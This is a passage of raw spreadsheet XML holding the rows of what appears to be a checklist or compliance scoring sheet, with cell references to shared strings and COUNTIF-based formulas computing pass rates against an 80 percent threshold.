      <c r="B116" s="45" t="s">
        <v>561</v>
      </c>
      <c r="C116" s="61"/>
      <c r="D116" s="44" t="s">
        <v>555</v>
      </c>
      <c r="E116" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F116" s="43" t="s">
        <v>562</v>
      </c>
      <c r="G116" s="44"/>
      <c r="H116" s="43"/>
      <c r="I116" s="44"/>
      <c r="J116" s="44"/>
      <c r="K116" s="44"/>
      <c r="L116" s="44"/>
      <c r="M116" s="44"/>
    </row>
    <row r="117" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B117" s="45" t="s">
        <v>563</v>
      </c>
      <c r="C117" s="61"/>
      <c r="D117" s="44" t="s">
        <v>555</v>
      </c>
      <c r="E117" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F117" s="43" t="s">
        <v>564</v>
      </c>
      <c r="G117" s="44"/>
      <c r="H117" s="43"/>
      <c r="I117" s="44"/>
      <c r="J117" s="44"/>
      <c r="K117" s="44"/>
      <c r="L117" s="44"/>
      <c r="M117" s="44"/>
    </row>
    <row r="118" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B118" s="45" t="s">
        <v>565</v>
      </c>
      <c r="C118" s="61"/>
      <c r="D118" s="44" t="s">
        <v>555</v>
      </c>
      <c r="E118" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F118" s="43" t="s">
        <v>566</v>
      </c>
      <c r="G118" s="44"/>
      <c r="H118" s="43"/>
      <c r="I118" s="44"/>
      <c r="J118" s="44"/>
      <c r="K118" s="44"/>
      <c r="L118" s="44"/>
      <c r="M118" s="44"/>
    </row>
    <row r="119" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B119" s="45" t="s">
        <v>567</v>
      </c>
      <c r="C119" s="61"/>
      <c r="D119" s="44" t="s">
        <v>555</v>
      </c>
      <c r="E119" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F119" s="43" t="s">
        <v>568</v>
      </c>
      <c r="G119" s="44"/>
      <c r="H119" s="43"/>
      <c r="I119" s="44"/>
      <c r="J119" s="44"/>
      <c r="K119" s="44"/>
      <c r="L119" s="44"/>
      <c r="M119" s="44"/>
    </row>
    <row r="120" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B120" s="45" t="s">
        <v>569</v>
      </c>
      <c r="C120" s="61"/>
      <c r="D120" s="44" t="s">
        <v>555</v>
      </c>
      <c r="E120" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F120" s="43" t="s">
        <v>570</v>
      </c>
      <c r="G120" s="44"/>
      <c r="H120" s="43"/>
      <c r="I120" s="44"/>
      <c r="J120" s="44"/>
      <c r="K120" s="44"/>
      <c r="L120" s="44"/>
      <c r="M120" s="44"/>
    </row>
    <row r="121" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B121" s="45" t="s">
        <v>571</v>
      </c>
      <c r="C121" s="61"/>
      <c r="D121" s="44" t="s">
        <v>555</v>
      </c>
      <c r="E121" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F121" s="43" t="s">
        <v>572</v>
      </c>
      <c r="G121" s="44"/>
      <c r="H121" s="43"/>
      <c r="I121" s="44"/>
      <c r="J121" s="44"/>
      <c r="K121" s="44"/>
      <c r="L121" s="44"/>
      <c r="M121" s="44"/>
    </row>
    <row r="122" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B122" s="45" t="s">
        <v>573</v>
      </c>
      <c r="C122" s="61"/>
      <c r="D122" s="44" t="s">
        <v>555</v>
      </c>
      <c r="E122" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F122" s="43" t="s">
        <v>574</v>
      </c>
      <c r="G122" s="44"/>
      <c r="H122" s="43"/>
      <c r="I122" s="44"/>
      <c r="J122" s="44"/>
      <c r="K122" s="44"/>
      <c r="L122" s="44"/>
      <c r="M122" s="44"/>
    </row>
    <row r="123" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B123" s="45" t="s">
        <v>575</v>
      </c>
      <c r="C123" s="61"/>
      <c r="D123" s="44" t="s">
        <v>555</v>
      </c>
      <c r="E123" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F123" s="43" t="s">
        <v>576</v>
      </c>
      <c r="G123" s="44"/>
      <c r="H123" s="43"/>
      <c r="I123" s="44"/>
      <c r="J123" s="44"/>
      <c r="K123" s="44"/>
      <c r="L123" s="44"/>
      <c r="M123" s="44"/>
    </row>
    <row r="124" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B124" s="45" t="s">
        <v>577</v>
      </c>
      <c r="C124" s="66"/>
      <c r="D124" s="48" t="s">
        <v>555</v>
      </c>
      <c r="E124" s="49" t="s">
        <v>23</v>
      </c>
      <c r="F124" s="50" t="s">
        <v>578</v>
      </c>
      <c r="G124" s="48"/>
      <c r="H124" s="50"/>
      <c r="I124" s="48"/>
      <c r="J124" s="48"/>
      <c r="K124" s="48"/>
      <c r="L124" s="48"/>
      <c r="M124" s="48"/>
    </row>
    <row r="125" s="29" customFormat="1" spans="2:13">
      <c r="B125" s="45" t="s">
        <v>579</v>
      </c>
      <c r="C125" s="138" t="s">
        <v>580</v>
      </c>
      <c r="D125" s="60" t="s">
        <v>581</v>
      </c>
      <c r="E125" s="59" t="s">
        <v>17</v>
      </c>
      <c r="F125" s="51" t="s">
        <v>582</v>
      </c>
      <c r="G125" s="60"/>
      <c r="H125" s="51"/>
      <c r="I125" s="60"/>
      <c r="J125" s="60"/>
      <c r="K125" s="60"/>
      <c r="L125" s="60"/>
      <c r="M125" s="60" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="126" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B126" s="45" t="s">
        <v>583</v>
      </c>
      <c r="C126" s="64"/>
      <c r="D126" s="44" t="s">
        <v>581</v>
      </c>
      <c r="E126" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F126" s="43" t="s">
        <v>584</v>
      </c>
      <c r="G126" s="44"/>
      <c r="H126" s="43"/>
      <c r="I126" s="44"/>
      <c r="J126" s="44"/>
      <c r="K126" s="44"/>
      <c r="L126" s="44"/>
      <c r="M126" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="127" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B127" s="45" t="s">
        <v>585</v>
      </c>
      <c r="C127" s="64"/>
      <c r="D127" s="44" t="s">
        <v>581</v>
      </c>
      <c r="E127" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F127" s="43" t="s">
        <v>586</v>
      </c>
      <c r="G127" s="44"/>
      <c r="H127" s="43"/>
      <c r="I127" s="44"/>
      <c r="J127" s="44"/>
      <c r="K127" s="44"/>
      <c r="L127" s="44"/>
      <c r="M127" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="128" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B128" s="45" t="s">
        <v>587</v>
      </c>
      <c r="C128" s="64"/>
      <c r="D128" s="44" t="s">
        <v>581</v>
      </c>
      <c r="E128" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F128" s="43" t="s">
        <v>588</v>
      </c>
      <c r="G128" s="44"/>
      <c r="H128" s="43"/>
      <c r="I128" s="44"/>
      <c r="J128" s="44"/>
      <c r="K128" s="44"/>
      <c r="L128" s="44"/>
      <c r="M128" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="129" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="B129" s="45" t="s">
        <v>589</v>
      </c>
      <c r="C129" s="64"/>
      <c r="D129" s="41" t="s">
        <v>581</v>
      </c>
      <c r="E129" s="57" t="s">
        <v>23</v>
      </c>
      <c r="F129" s="56" t="s">
        <v>590</v>
      </c>
      <c r="G129" s="41"/>
      <c r="H129" s="56"/>
      <c r="I129" s="41"/>
      <c r="J129" s="41"/>
      <c r="K129" s="41"/>
      <c r="L129" s="41"/>
      <c r="M129" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="130" s="29" customFormat="1" spans="1:13">
      <c r="A130" s="60"/>
      <c r="B130" s="45" t="s">
        <v>591</v>
      </c>
      <c r="C130" s="123" t="s">
        <v>592</v>
      </c>
      <c r="D130" s="60" t="s">
        <v>593</v>
      </c>
      <c r="E130" s="59" t="s">
        <v>17</v>
      </c>
      <c r="F130" s="51" t="s">
        <v>594</v>
      </c>
      <c r="G130" s="60"/>
      <c r="H130" s="51"/>
      <c r="I130" s="60"/>
      <c r="J130" s="60"/>
      <c r="K130" s="60"/>
      <c r="L130" s="60"/>
      <c r="M130" s="60" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="131" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A131" s="44"/>
      <c r="B131" s="45" t="s">
        <v>595</v>
      </c>
      <c r="C131" s="42"/>
      <c r="D131" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E131" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F131" s="43" t="s">
        <v>596</v>
      </c>
      <c r="G131" s="44"/>
      <c r="H131" s="43"/>
      <c r="I131" s="44"/>
      <c r="J131" s="44"/>
      <c r="K131" s="44"/>
      <c r="L131" s="44"/>
      <c r="M131" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="132" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A132" s="44"/>
      <c r="B132" s="45" t="s">
        <v>597</v>
      </c>
      <c r="C132" s="42"/>
      <c r="D132" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E132" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F132" s="43" t="s">
        <v>598</v>
      </c>
      <c r="G132" s="44"/>
      <c r="H132" s="43"/>
      <c r="I132" s="44"/>
      <c r="J132" s="44"/>
      <c r="K132" s="44"/>
      <c r="L132" s="44"/>
      <c r="M132" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="133" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A133" s="44"/>
      <c r="B133" s="45" t="s">
        <v>599</v>
      </c>
      <c r="C133" s="42"/>
      <c r="D133" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E133" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F133" s="43" t="s">
        <v>600</v>
      </c>
      <c r="G133" s="44"/>
      <c r="H133" s="43"/>
      <c r="I133" s="44"/>
      <c r="J133" s="44"/>
      <c r="K133" s="44"/>
      <c r="L133" s="44"/>
      <c r="M133" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="134" s="29" customFormat="1" ht="26.25" customHeight="1" spans="1:13">
      <c r="A134" s="44"/>
      <c r="B134" s="45" t="s">
        <v>601</v>
      </c>
      <c r="C134" s="42"/>
      <c r="D134" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E134" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F134" s="43" t="s">
        <v>602</v>
      </c>
      <c r="G134" s="44"/>
      <c r="H134" s="43"/>
      <c r="I134" s="44"/>
      <c r="J134" s="44"/>
      <c r="K134" s="44"/>
      <c r="L134" s="44"/>
      <c r="M134" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="135" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A135" s="44"/>
      <c r="B135" s="45" t="s">
        <v>603</v>
      </c>
      <c r="C135" s="42"/>
      <c r="D135" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E135" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F135" s="43" t="s">
        <v>604</v>
      </c>
      <c r="G135" s="44"/>
      <c r="H135" s="43"/>
      <c r="I135" s="44"/>
      <c r="J135" s="44"/>
      <c r="K135" s="44"/>
      <c r="L135" s="44"/>
      <c r="M135" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="136" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A136" s="44"/>
      <c r="B136" s="45" t="s">
        <v>605</v>
      </c>
      <c r="C136" s="42"/>
      <c r="D136" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E136" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F136" s="43" t="s">
        <v>606</v>
      </c>
      <c r="G136" s="44"/>
      <c r="H136" s="43"/>
      <c r="I136" s="44"/>
      <c r="J136" s="44"/>
      <c r="K136" s="44"/>
      <c r="L136" s="44"/>
      <c r="M136" s="44" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="137" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A137" s="44"/>
      <c r="B137" s="45" t="s">
        <v>607</v>
      </c>
      <c r="C137" s="42"/>
      <c r="D137" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E137" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F137" s="43" t="s">
        <v>608</v>
      </c>
      <c r="G137" s="44"/>
      <c r="H137" s="43"/>
      <c r="I137" s="44"/>
      <c r="J137" s="44"/>
      <c r="K137" s="44"/>
      <c r="L137" s="44"/>
      <c r="M137" s="44"/>
    </row>
    <row r="138" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A138" s="44"/>
      <c r="B138" s="45" t="s">
        <v>609</v>
      </c>
      <c r="C138" s="42"/>
      <c r="D138" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E138" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F138" s="43" t="s">
        <v>610</v>
      </c>
      <c r="G138" s="44"/>
      <c r="H138" s="43"/>
      <c r="I138" s="44"/>
      <c r="J138" s="44"/>
      <c r="K138" s="44"/>
      <c r="L138" s="44"/>
      <c r="M138" s="44"/>
    </row>
    <row r="139" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A139" s="44"/>
      <c r="B139" s="45" t="s">
        <v>611</v>
      </c>
      <c r="C139" s="42"/>
      <c r="D139" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E139" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F139" s="43" t="s">
        <v>612</v>
      </c>
      <c r="G139" s="44"/>
      <c r="H139" s="43"/>
      <c r="I139" s="44"/>
      <c r="J139" s="44"/>
      <c r="K139" s="44"/>
      <c r="L139" s="44"/>
      <c r="M139" s="44"/>
    </row>
    <row r="140" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A140" s="44"/>
      <c r="B140" s="45" t="s">
        <v>613</v>
      </c>
      <c r="C140" s="42"/>
      <c r="D140" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E140" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F140" s="43" t="s">
        <v>614</v>
      </c>
      <c r="G140" s="44"/>
      <c r="H140" s="43"/>
      <c r="I140" s="44"/>
      <c r="J140" s="44"/>
      <c r="K140" s="44"/>
      <c r="L140" s="44"/>
      <c r="M140" s="44"/>
    </row>
    <row r="141" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A141" s="44"/>
      <c r="B141" s="45" t="s">
        <v>615</v>
      </c>
      <c r="C141" s="42"/>
      <c r="D141" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E141" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F141" s="43" t="s">
        <v>616</v>
      </c>
      <c r="G141" s="44"/>
      <c r="H141" s="43"/>
      <c r="I141" s="44"/>
      <c r="J141" s="44"/>
      <c r="K141" s="44"/>
      <c r="L141" s="44"/>
      <c r="M141" s="44"/>
    </row>
    <row r="142" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A142" s="44"/>
      <c r="B142" s="45" t="s">
        <v>617</v>
      </c>
      <c r="C142" s="42"/>
      <c r="D142" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E142" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F142" s="43" t="s">
        <v>618</v>
      </c>
      <c r="G142" s="44"/>
      <c r="H142" s="43"/>
      <c r="I142" s="44"/>
      <c r="J142" s="44"/>
      <c r="K142" s="44"/>
      <c r="L142" s="44"/>
      <c r="M142" s="44"/>
    </row>
    <row r="143" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A143" s="44"/>
      <c r="B143" s="45" t="s">
        <v>619</v>
      </c>
      <c r="C143" s="42"/>
      <c r="D143" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E143" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F143" s="43" t="s">
        <v>620</v>
      </c>
      <c r="G143" s="44"/>
      <c r="H143" s="43"/>
      <c r="I143" s="44"/>
      <c r="J143" s="44"/>
      <c r="K143" s="44"/>
      <c r="L143" s="44"/>
      <c r="M143" s="44"/>
    </row>
    <row r="144" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A144" s="41"/>
      <c r="B144" s="45" t="s">
        <v>621</v>
      </c>
      <c r="C144" s="57"/>
      <c r="D144" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E144" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F144" s="43" t="s">
        <v>622</v>
      </c>
      <c r="G144" s="44"/>
      <c r="H144" s="43"/>
      <c r="I144" s="44"/>
      <c r="J144" s="44"/>
      <c r="K144" s="41"/>
      <c r="L144" s="41"/>
      <c r="M144" s="41"/>
    </row>
    <row r="145" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A145" s="41"/>
      <c r="B145" s="45" t="s">
        <v>623</v>
      </c>
      <c r="C145" s="57"/>
      <c r="D145" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E145" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F145" s="43" t="s">
        <v>624</v>
      </c>
      <c r="G145" s="44"/>
      <c r="H145" s="43"/>
      <c r="I145" s="44"/>
      <c r="J145" s="44"/>
      <c r="K145" s="41"/>
      <c r="L145" s="41"/>
      <c r="M145" s="41"/>
    </row>
    <row r="146" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A146" s="41"/>
      <c r="B146" s="45" t="s">
        <v>625</v>
      </c>
      <c r="C146" s="57"/>
      <c r="D146" s="44" t="s">
        <v>593</v>
      </c>
      <c r="E146" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F146" s="43" t="s">
        <v>626</v>
      </c>
      <c r="G146" s="44"/>
      <c r="H146" s="43"/>
      <c r="I146" s="44"/>
      <c r="J146" s="44"/>
      <c r="K146" s="44"/>
      <c r="L146" s="44"/>
      <c r="M146" s="44"/>
    </row>
    <row r="147" s="29" customFormat="1" ht="15" customHeight="1" spans="1:13">
      <c r="A147" s="48"/>
      <c r="B147" s="45" t="s">
        <v>627</v>
      </c>
      <c r="C147" s="49"/>
      <c r="D147" s="68" t="s">
        <v>593</v>
      </c>
      <c r="E147" s="69" t="s">
        <v>17</v>
      </c>
      <c r="F147" s="70" t="s">
        <v>622</v>
      </c>
      <c r="G147" s="68"/>
      <c r="H147" s="70"/>
      <c r="I147" s="68"/>
      <c r="J147" s="68"/>
      <c r="K147" s="68"/>
      <c r="L147" s="68"/>
      <c r="M147" s="68"/>
    </row>
    <row r="148" s="29" customFormat="1" ht="28.5" customHeight="1" spans="1:13">
      <c r="B148" s="45" t="s">
        <v>628</v>
      </c>
      <c r="C148" s="139" t="s">
        <v>629</v>
      </c>
      <c r="D148" s="72" t="s">
        <v>630</v>
      </c>
      <c r="E148" s="72" t="s">
        <v>23</v>
      </c>
      <c r="F148" s="71" t="s">
        <v>631</v>
      </c>
      <c r="G148" s="73"/>
      <c r="H148" s="71"/>
      <c r="I148" s="73"/>
      <c r="J148" s="73"/>
      <c r="K148" s="73"/>
      <c r="L148" s="73"/>
      <c r="M148" s="73" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="149" spans="1:13">
      <c r="B149" s="45" t="s">
        <v>632</v>
      </c>
      <c r="C149" s="74"/>
      <c r="D149" s="75" t="s">
        <v>294</v>
      </c>
      <c r="E149" s="75"/>
      <c r="F149" s="76"/>
      <c r="G149" s="77"/>
      <c r="H149" s="76"/>
      <c r="I149" s="77"/>
      <c r="J149" s="77"/>
      <c r="K149" s="77"/>
      <c r="L149" s="77"/>
      <c r="M149" s="77"/>
    </row>
    <row r="150" ht="15" customHeight="1" spans="1:13">
      <c r="B150" s="45" t="s">
        <v>633</v>
      </c>
      <c r="C150" s="74"/>
      <c r="D150" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E150" s="78"/>
      <c r="F150" s="79"/>
      <c r="G150" s="80"/>
      <c r="H150" s="79"/>
      <c r="I150" s="80"/>
      <c r="J150" s="80"/>
      <c r="K150" s="80"/>
      <c r="L150" s="80"/>
      <c r="M150" s="80"/>
    </row>
    <row r="151" ht="15" customHeight="1" spans="1:13">
      <c r="B151" s="45" t="s">
        <v>634</v>
      </c>
      <c r="C151" s="74"/>
      <c r="D151" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E151" s="78"/>
      <c r="F151" s="79"/>
      <c r="G151" s="80"/>
      <c r="H151" s="79"/>
      <c r="I151" s="80"/>
      <c r="J151" s="80"/>
      <c r="K151" s="80"/>
      <c r="L151" s="80"/>
      <c r="M151" s="80"/>
    </row>
    <row r="152" ht="15" customHeight="1" spans="1:13">
      <c r="B152" s="45" t="s">
        <v>635</v>
      </c>
      <c r="C152" s="74"/>
      <c r="D152" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E152" s="78"/>
      <c r="F152" s="79"/>
      <c r="G152" s="80"/>
      <c r="H152" s="79"/>
      <c r="I152" s="80"/>
      <c r="J152" s="80"/>
      <c r="K152" s="80"/>
      <c r="L152" s="80"/>
      <c r="M152" s="80"/>
    </row>
    <row r="153" ht="15" customHeight="1" spans="1:13">
      <c r="B153" s="45" t="s">
        <v>636</v>
      </c>
      <c r="C153" s="74"/>
      <c r="D153" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E153" s="78"/>
      <c r="F153" s="79"/>
      <c r="G153" s="80"/>
      <c r="H153" s="79"/>
      <c r="I153" s="80"/>
      <c r="J153" s="80"/>
      <c r="K153" s="80"/>
      <c r="L153" s="80"/>
      <c r="M153" s="80"/>
    </row>
    <row r="154" ht="15" customHeight="1" spans="1:13">
      <c r="B154" s="45" t="s">
        <v>637</v>
      </c>
      <c r="C154" s="74"/>
      <c r="D154" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E154" s="78"/>
      <c r="F154" s="79"/>
      <c r="G154" s="80"/>
      <c r="H154" s="79"/>
      <c r="I154" s="80"/>
      <c r="J154" s="80"/>
      <c r="K154" s="80"/>
      <c r="L154" s="80"/>
      <c r="M154" s="80"/>
    </row>
    <row r="155" ht="15" customHeight="1" spans="1:13">
      <c r="B155" s="45" t="s">
        <v>638</v>
      </c>
      <c r="C155" s="74"/>
      <c r="D155" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E155" s="78"/>
      <c r="F155" s="79"/>
      <c r="G155" s="80"/>
      <c r="H155" s="79"/>
      <c r="I155" s="80"/>
      <c r="J155" s="80"/>
      <c r="K155" s="80"/>
      <c r="L155" s="80"/>
      <c r="M155" s="80"/>
    </row>
    <row r="156" ht="15" customHeight="1" spans="1:13">
      <c r="B156" s="45" t="s">
        <v>639</v>
      </c>
      <c r="C156" s="74"/>
      <c r="D156" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E156" s="78"/>
      <c r="F156" s="79"/>
      <c r="G156" s="80"/>
      <c r="H156" s="79"/>
      <c r="I156" s="80"/>
      <c r="J156" s="80"/>
      <c r="K156" s="80"/>
      <c r="L156" s="80"/>
      <c r="M156" s="80"/>
    </row>
    <row r="157" ht="15" customHeight="1" spans="1:13">
      <c r="B157" s="45" t="s">
        <v>640</v>
      </c>
      <c r="C157" s="74"/>
      <c r="D157" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E157" s="78"/>
      <c r="F157" s="79"/>
      <c r="G157" s="80"/>
      <c r="H157" s="79"/>
      <c r="I157" s="80"/>
      <c r="J157" s="80"/>
      <c r="K157" s="80"/>
      <c r="L157" s="80"/>
      <c r="M157" s="80"/>
    </row>
    <row r="158" ht="15" customHeight="1" spans="1:13">
      <c r="B158" s="45" t="s">
        <v>641</v>
      </c>
      <c r="C158" s="74"/>
      <c r="D158" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E158" s="78"/>
      <c r="F158" s="79"/>
      <c r="G158" s="80"/>
      <c r="H158" s="79"/>
      <c r="I158" s="80"/>
      <c r="J158" s="80"/>
      <c r="K158" s="80"/>
      <c r="L158" s="80"/>
      <c r="M158" s="80"/>
    </row>
    <row r="159" ht="15" customHeight="1" spans="1:13">
      <c r="B159" s="45" t="s">
        <v>642</v>
      </c>
      <c r="C159" s="81"/>
      <c r="D159" s="78" t="s">
        <v>294</v>
      </c>
      <c r="E159" s="78"/>
      <c r="F159" s="79"/>
      <c r="G159" s="80"/>
      <c r="H159" s="79"/>
      <c r="I159" s="80"/>
      <c r="J159" s="80"/>
      <c r="K159" s="80"/>
      <c r="L159" s="80"/>
      <c r="M159" s="80"/>
    </row>
    <row r="160" spans="1:13">
      <c r="B160" s="62"/>
      <c r="C160" s="82"/>
      <c r="D160" s="83"/>
      <c r="E160" s="84"/>
      <c r="F160" s="82"/>
      <c r="G160" s="82"/>
      <c r="H160" s="85"/>
      <c r="I160" s="82"/>
      <c r="J160" s="82"/>
      <c r="K160" s="82"/>
      <c r="L160" s="82"/>
      <c r="M160" s="82"/>
    </row>
    <row r="162" ht="15" customHeight="1" spans="3:13">
      <c r="G162" s="86" t="s">
        <v>302</v>
      </c>
      <c r="H162" s="86"/>
      <c r="I162" s="87">
        <v>0.8</v>
      </c>
    </row>
    <row r="163" ht="15" customHeight="1" spans="3:13">
      <c r="C163" s="88"/>
      <c r="E163" s="89" t="s">
        <v>303</v>
      </c>
      <c r="F163" s="90">
        <f>SUM(F164:F165)</f>
        <v>145</v>
      </c>
      <c r="G163" s="89" t="s">
        <v>304</v>
      </c>
      <c r="H163" s="91" t="str">
        <f>IF(AND(H164&gt;=$I$162,H165&gt;=$I$162,COUNTIFS($H$4:$H$160,"NO",$M$4:$M$160,"Mandatory")=0),"Passed","Failed")</f>
        <v>Failed</v>
      </c>
    </row>
    <row r="164" ht="15" customHeight="1" spans="3:13">
      <c r="C164" s="88"/>
      <c r="E164" s="89" t="s">
        <v>23</v>
      </c>
      <c r="F164" s="90">
        <f>COUNTIF($E$4:$E$160,E164)</f>
        <v>54</v>
      </c>
      <c r="G164" s="89" t="s">
        <v>23</v>
      </c>
      <c r="H164" s="92">
        <f>COUNTIFS($E$4:$E$160,G164,$H$4:$H$160,"YES")/F164*100%</f>
        <v>0</v>
      </c>
      <c r="I164" s="93">
        <f>F164*$I$162</f>
        <v>43.2</v>
      </c>
      <c r="J164" s="94" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="165" ht="15" customHeight="1" spans="3:13">
      <c r="C165" s="88"/>
      <c r="E165" s="89" t="s">
        <v>17</v>
      </c>
      <c r="F165" s="90">
        <f>COUNTIF($E$4:$E$160,E165)</f>
        <v>91</v>
      </c>
      <c r="G165" s="89" t="s">
        <v>17</v>
      </c>
      <c r="H165" s="92">
        <f>COUNTIFS($E$4:$E$160,G165,$H$4:$H$160,"YES")/F165*100%</f>
        <v>0</v>
      </c>
      <c r="I165" s="95">
        <f>F165*$I$162</f>
        <v>72.8</v>
      </c>
      <c r="J165" s="96"/>
    </row>
    <row r="166" ht="15" customHeight="1"/>
    <row r="167" ht="15" customHeight="1" spans="3:13">
      <c r="G167" s="86" t="s">
        <v>306</v>
      </c>
      <c r="H167" s="86"/>
    </row>
    <row r="168" ht="15" customHeight="1" spans="3:13">
      <c r="D168" s="97" t="s">
        <v>307</v>
      </c>
      <c r="E168" s="89" t="s">
        <v>303</v>
      </c>
      <c r="F168" s="90">
        <f>SUM(F169:F170)</f>
        <v>0</v>
      </c>
      <c r="G168" s="89" t="s">
        <v>307</v>
      </c>
      <c r="H168" s="91" t="e">
        <f>IF(AND(H169&gt;=$I$162,H170&gt;=$I$162),"Passed","Failed")</f>
        <v>#DIV/0!</v>
      </c>
    </row>
    <row r="169" ht="15" customHeight="1" spans="3:13">
      <c r="D169" s="97"/>
      <c r="E169" s="89" t="s">
        <v>23</v>
      </c>
      <c r="F169" s="90">
        <f>COUNTIFS($E$4:$E$160,E169,$I$4:$I$160,"YES")+COUNTIFS($E$4:$E$160,E169,$I$4:$I$160,"NO")</f>
        <v>0</v>
      </c>
      <c r="G169" s="89" t="s">
        <v>23</v>
      </c>
      <c r="H169" s="92" t="e">
        <f>COUNTIFS($E$4:$E$160,G169,$I$4:$I$160,"YES")/F169*100%</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L169" s="98" t="s">
        <v>308</v>
      </c>
      <c r="M169" s="98"/>
    </row>
    <row r="170" ht="15" customHeight="1" spans="3:13">
      <c r="D170" s="97"/>
      <c r="E170" s="89" t="s">
        <v>17</v>
      </c>
      <c r="F170" s="90">
        <f>COUNTIFS($E$4:$E$160,E170,$I$4:$I$160,"YES")+COUNTIFS($E$4:$E$160,E170,$I$4:$I$160,"NO")</f>
        <v>0</v>
      </c>
      <c r="G170" s="89" t="s">
        <v>17</v>
      </c>
      <c r="H170" s="92" t="e">
        <f>COUNTIFS($E$4:$E$160,G170,$I$4:$I$160,"YES")/F170*100%</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L170" s="99">
        <v>0.01</v>
      </c>
      <c r="M170" s="100" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="171" ht="15" customHeight="1" spans="3:13">
      <c r="L171" s="99">
        <v>0.5</v>
      </c>
      <c r="M171" s="100" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="172" ht="15" customHeight="1" spans="3:13">
      <c r="D172" s="97" t="s">
